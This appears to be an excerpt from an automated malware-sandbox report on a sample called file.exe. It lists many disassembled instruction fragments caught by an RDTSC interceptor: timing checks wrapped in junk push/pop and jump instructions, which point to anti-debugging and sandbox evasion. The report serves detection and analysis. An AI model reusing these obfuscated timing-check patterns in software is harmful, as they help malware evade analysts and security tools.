              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2A35 second address: 102ED9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f jno 00007EFFAC79DCCCh 0x00000015 push dword ptr [ebp+122D06C9h] 0x0000001b push ecx 0x0000001c add dword ptr [ebp+122D1BF2h], esi 0x00000022 pop ecx 0x00000023 call dword ptr [ebp+122D26F6h] 0x00000029 pushad 0x0000002a jmp 00007EFFAC79DCCCh 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D2558h], ebx 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b sub dword ptr [ebp+122D2558h], ecx 0x00000041 mov dword ptr [ebp+122D2D6Fh], eax 0x00000047 stc 0x00000048 mov esi, 0000003Ch 0x0000004d jmp 00007EFFAC79DCD9h 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 js 00007EFFAC79DCD8h 0x0000005c jmp 00007EFFAC79DCD2h 0x00000061 lodsw 0x00000063 mov dword ptr [ebp+122D2558h], eax 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007EFFAC79DCD6h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D2A76h], ebx 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jc 00007EFFAC79DCC8h 0x00000085 pushad 0x00000086 popad 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AE1 second address: 11D2AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AE5 second address: 11D2AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007EFFAC79DCC8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AF9 second address: 11D2AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AFE second address: 11D2B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007EFFAC79DCD9h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2B3E second address: 11D2B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007EFFACBF2F88h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f xor edi, dword ptr [ebp+122D2C4Bh] 0x00000035 push 65585B3Dh 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d jmp 00007EFFACBF2F8Dh 0x00000042 pop esi 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2B8C second address: 11D2B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CA6 second address: 11D2CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFFACBF2F8Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CC4 second address: 11D2CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CCA second address: 11D2CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CCE second address: 11D2CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFAC79DCCCh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CE5 second address: 11D2CEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2E4A second address: 11D2E4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2FCD second address: 11D2FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D338F second address: 11D3395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3395 second address: 11D3399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3399 second address: 11D339D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D339D second address: 11D3404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007EFFACBF2F88h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 je 00007EFFACBF2F8Ch 0x0000002c add ebx, dword ptr [ebp+122D332Bh] 0x00000032 adc edx, 3A446026h 0x00000038 popad 0x00000039 push 0000001Eh 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007EFFACBF2F88h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 mov di, 6B4Ah 0x00000059 nop 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3404 second address: 11D3439 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007EFFAC79DCDFh 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007EFFAC79DCD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB4BA second address: 11BB4C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12105DA second address: 12105DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12105DE second address: 12105E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210844 second address: 121084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121084A second address: 121085B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007EFFACBF2F86h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121085B second address: 1210860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121575D second address: 121577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFFACBF2F86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007EFFACBF2F8Ah 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121577D second address: 1215792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD0h 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215904 second address: 1215921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F98h 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215921 second address: 121592B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFFAC79DCC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215DC7 second address: 1215DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215F1E second address: 1215F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215F23 second address: 1215F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007EFFACBF2F86h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216234 second address: 1216251 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFAC79DCC6h 0x00000008 jmp 00007EFFAC79DCD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216251 second address: 1216298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F96h 0x00000007 pushad 0x00000008 jnp 00007EFFACBF2F86h 0x0000000e jmp 00007EFFACBF2F97h 0x00000013 jmp 00007EFFACBF2F8Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12163DE second address: 12163E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216983 second address: 121699E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFACBF2F96h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151ED second address: 12151F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151F6 second address: 12151FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12151FC second address: 1215229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007EFFAC79DCD9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C62B second address: 121C632 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A7DC second address: 118A7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD2h 0x00000009 jng 00007EFFAC79DCC6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A7FD second address: 118A801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A801 second address: 118A81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007EFFAC79DCCDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B489 second address: 121B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Bh 0x00000007 jns 00007EFFACBF2F86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jo 00007EFFACBF2F86h 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B4A6 second address: 121B4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFFAC79DCD9h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007EFFAC79DCD2h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAA2 second address: 121BAAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAAF second address: 121BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAB4 second address: 121BAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BAB9 second address: 121BACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFFAC79DCC6h 0x0000000a jp 00007EFFAC79DCC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B033 second address: 121B03B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B03B second address: 121B079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 jo 00007EFFAC79DCC8h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jno 00007EFFAC79DCDBh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B079 second address: 121B085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFFACBF2F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B085 second address: 121B08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C07D second address: 121C081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C350 second address: 121C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD7h 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223DE3 second address: 1223DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224241 second address: 1224247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224247 second address: 122424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122424B second address: 1224254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224254 second address: 1224263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007EFFACBF2F86h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224263 second address: 1224297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007EFFAC79DCC6h 0x00000013 jmp 00007EFFAC79DCD4h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224297 second address: 122429D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11872CB second address: 11872D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12265FE second address: 1226645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFFACBF2F92h 0x0000000f jmp 00007EFFACBF2F99h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226645 second address: 122664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122664A second address: 122666D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFACBF2F97h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122666D second address: 1226671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AE7C second address: 122AE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AFF4 second address: 122AFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB1A second address: 122EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007EFFACBF2F99h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB3D second address: 122EB60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCD1h 0x00000011 je 00007EFFAC79DCC6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB60 second address: 122EB74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFFACBF2F8Ch 0x0000000e jbe 00007EFFACBF2F86h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB74 second address: 122EB87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB87 second address: 122EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF5E second address: 122EF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFFAC79DCCBh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF70 second address: 122EF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF76 second address: 122EF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF7C second address: 122EF83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234C11 second address: 1234C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1234C17 second address: 1234C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007EFFACBF2F8Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12337DF second address: 1233818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnp 00007EFFAC79DCC6h 0x0000000c pop edi 0x0000000d jmp 00007EFFAC79DCD2h 0x00000012 jmp 00007EFFAC79DCD4h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233818 second address: 123381C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123381C second address: 1233836 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFAC79DCC6h 0x00000008 jo 00007EFFAC79DCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123398F second address: 1233995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233995 second address: 123399C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123399C second address: 12339A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12339A2 second address: 12339A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B15 second address: 1233B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B19 second address: 1233B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
